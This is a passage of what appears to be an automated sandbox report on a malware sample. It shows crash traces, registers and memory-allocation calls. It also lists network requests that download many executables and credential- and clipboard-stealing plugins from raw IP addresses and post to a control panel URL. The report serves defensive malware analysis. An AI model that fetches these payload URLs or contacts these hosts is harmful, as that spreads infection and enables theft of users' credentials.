stan+0x298ee1 @ 0xe68ee1
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
RtlpNtEnumerateSubKey+0x2a2b isupper-0x4e2b ntdll+0xcf559 @ 0x76fdf559
RtlpNtEnumerateSubKey+0x2b0b isupper-0x4d4b ntdll+0xcf639 @ 0x76fdf639
RtlUlonglongByteSwap+0xba5 RtlFreeOemString-0x20d35 ntdll+0x7df95 @ 0x76f8df95
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
stan+0xf38bf @ 0xcc38bf
stan+0xea2de @ 0xcba2de
stan+0xdc00d @ 0xcac00d
stan+0x10a272 @ 0xcda272
stan+0xeec93 @ 0xcbec93
stan+0xeef47 @ 0xcbef47
stan+0xebb0a @ 0xcbbb0a
stan+0xeba36 @ 0xcbba36
stan+0xebbf8 @ 0xcbbbf8
stan+0xebd5f @ 0xcbbd5f
stan+0xdc393 @ 0xcac393
stan+0x148100 @ 0xd18100
stan+0x298fb3 @ 0xe68fb3
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: eb 12 8b 45 ec 8b 08 8b 09 50 51 e8 6f ff ff ff
exception.symbol: RtlpNtEnumerateSubKey+0x1b25 isupper-0x5d31 ntdll+0xce653
exception.instruction: jmp 0x76fde667
exception.module: ntdll.dll
exception.exception_code: 0xc0000374
exception.offset: 845395
exception.address: 0x76fde653
registers.esp: 1505960
registers.edi: 2866280
registers.eax: 1505976
registers.ebp: 1506080
registers.edx: 0
registers.ebx: 0
registers.esi: 2686976
registers.ecx: 2147483647
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 113308432
registers.edi: 95063068
registers.eax: 113308432
registers.ebp: 113308512
registers.edx: 31
registers.ebx: 113308796
registers.esi: 2147746133
registers.ecx: 95342760
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7617ea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7617ba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75857bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x761a516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x761a50ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x761a530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x761a57a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x7167540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x716752ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x71750ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x76f77e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x76f554f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 77583968
registers.edi: 1953561104
registers.eax: 77583968
registers.ebp: 77584048
registers.edx: 1
registers.ebx: 7160388
registers.esi: 2147746133
registers.ecx: 1610980466
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bb2f0 @ 0xadb2f0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030440
registers.edi: 11362444
registers.eax: 0
registers.ebp: 2030468
registers.edx: 2
registers.ebx: 40580032
registers.esi: 5
registers.ecx: 40580032
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdbf6 @ 0xaddbf6
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 11362444
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 5832704
registers.esi: 10027008
registers.ecx: 10027008
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdbf6 @ 0xaddbf6
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 2
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdbf6 @ 0xaddbf6
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 2
registers.ebx: 10773018
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdbf6 @ 0xaddbf6
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10773018
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdcd2 @ 0xaddcd2
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 11362444
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 5832704
registers.esi: 10027008
registers.ecx: 0
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdcd2 @ 0xaddcd2
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdcd2 @ 0xaddcd2
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 2
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdcd2 @ 0xaddcd2
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10773018
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdcd2 @ 0xaddcd2
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdda4 @ 0xaddda4
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 11362444
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 5832704
registers.esi: 10027008
registers.ecx: 2030420
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdda4 @ 0xaddda4
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 2
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bde9e @ 0xadde9e
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 11362444
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 5832704
registers.esi: 10027008
registers.ecx: 1643292471
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bde9e @ 0xadde9e
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bde9e @ 0xadde9e
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bde9e @ 0xadde9e
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 2
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdf34 @ 0xaddf34
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030392
registers.edi: 11362444
registers.eax: 0
registers.ebp: 2030420
registers.edx: 2
registers.ebx: 5832704
registers.esi: 10027008
registers.ecx: 2315255495
1 0 0

__exception__

stacktrace:
vhanzrtsx6odxe2wledh+0x1bdf34 @ 0xaddf34
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 10773018
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

stacktrace:
explorhe+0x1bb2f0 @ 0x11bb2f0
explorhe+0x1498dc @ 0x11498dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: explorhe+0x126204
exception.instruction: ud2
exception.module: explorhe.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0x1126204
registers.esp: 3406036
registers.edi: 18571404
registers.eax: 0
registers.ebp: 3406064
registers.edx: 2
registers.ebx: 8008628
registers.esi: 5
registers.ecx: 8008628
1 0 0
suspicious_features Connection to IP address suspicious_request HEAD http://109.107.182.3/cost/go.exe
suspicious_features Connection to IP address suspicious_request GET http://109.107.182.3/cost/go.exe
suspicious_features Connection to IP address suspicious_request HEAD http://185.215.113.68/mine/amer.exe
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.68/mine/amer.exe
suspicious_features Connection to IP address suspicious_request HEAD http://109.107.182.3/cost/nika.exe
suspicious_features Connection to IP address suspicious_request GET http://109.107.182.3/cost/nika.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.215.113.68/theme/index.php
suspicious_features Connection to IP address suspicious_request HEAD http://109.107.182.3/cost/vimu.exe
suspicious_features Connection to IP address suspicious_request GET http://109.107.182.3/cost/vimu.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.68/mine/stan.exe
suspicious_features Connection to IP address suspicious_request HEAD http://109.107.182.3/cost/networ.exe
suspicious_features Connection to IP address suspicious_request GET http://109.107.182.3/cost/networ.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/moto.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.68/theme/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.68/theme/Plugins/clip64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/store.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/TrueCrypt_NKwtUN.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/kskskfsf.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.172.128.19/latestrocki.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/gold1234.exe
suspicious_features Connection to IP address suspicious_request GET http://185.172.128.90/cpa/ping.php?substr=seven&s=ab
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/crypted.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/rdx1122.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/alex.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/leg221.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/Awwnbpxqsf.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.3/lego/2024.exe
request HEAD http://109.107.182.3/cost/go.exe
request GET http://109.107.182.3/cost/go.exe
request HEAD http://185.215.113.68/mine/amer.exe
request GET http://185.215.113.68/mine/amer.exe
request HEAD http://109.107.182.3/cost/nika.exe
request GET http://109.107.182.3/cost/nika.exe
request POST http://185.215.113.68/theme/index.php
request HEAD http://109.107.182.3/cost/vimu.exe
request GET http://109.107.182.3/cost/vimu.exe
request GET http://185.215.113.68/mine/stan.exe
request HEAD http://109.107.182.3/cost/networ.exe
request GET http://109.107.182.3/cost/networ.exe
request GET http://109.107.182.3/lego/moto.exe
request GET http://185.215.113.68/theme/Plugins/cred64.dll
request GET http://185.215.113.68/theme/Plugins/clip64.dll
request GET http://109.107.182.3/lego/store.exe
request GET http://109.107.182.3/lego/TrueCrypt_NKwtUN.exe
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET http://109.107.182.3/lego/kskskfsf.exe
request GET http://185.172.128.19/latestrocki.exe
request GET http://109.107.182.3/lego/gold1234.exe
request GET http://185.172.128.90/cpa/ping.php?substr=seven&s=ab
request GET http://109.107.182.3/lego/crypted.exe
request GET http://109.107.182.3/lego/rdx1122.exe
request GET http://109.107.182.3/lego/alex.exe
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://109.107.182.3/lego/leg221.exe
request GET http://109.107.182.3/lego/Awwnbpxqsf.exe
request GET http://109.107.182.3/lego/2024.exe
request GET https://db-ip.com/demo/home.php?s=175.208.134.152
request GET https://accounts.google.com/
request GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ASKXGp3437MpdLqeJXXmnjo86ElWj-h7hAFZEOqRy5ULnXiPzkWs5AxnDO0Ovl-mxK_rlOLCFHwf
request GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp3vDgA9dYQaukba9RXlX2wDMY1M-AxrCojfMZ91Il_gwrJz-Ee78hH-C5Y4mLG_WvowvhkPKQ&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S1963367809%3A1706140574270777
request GET https://accounts.google.com/_/bscframe
request GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request GET https://accounts.google.com/favicon.ico
request GET https://www.google.com/favicon.ico
request GET https://accounts.google.com/generate_204?QWfFag
request POST http://185.215.113.68/theme/index.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 2936832
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2540
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
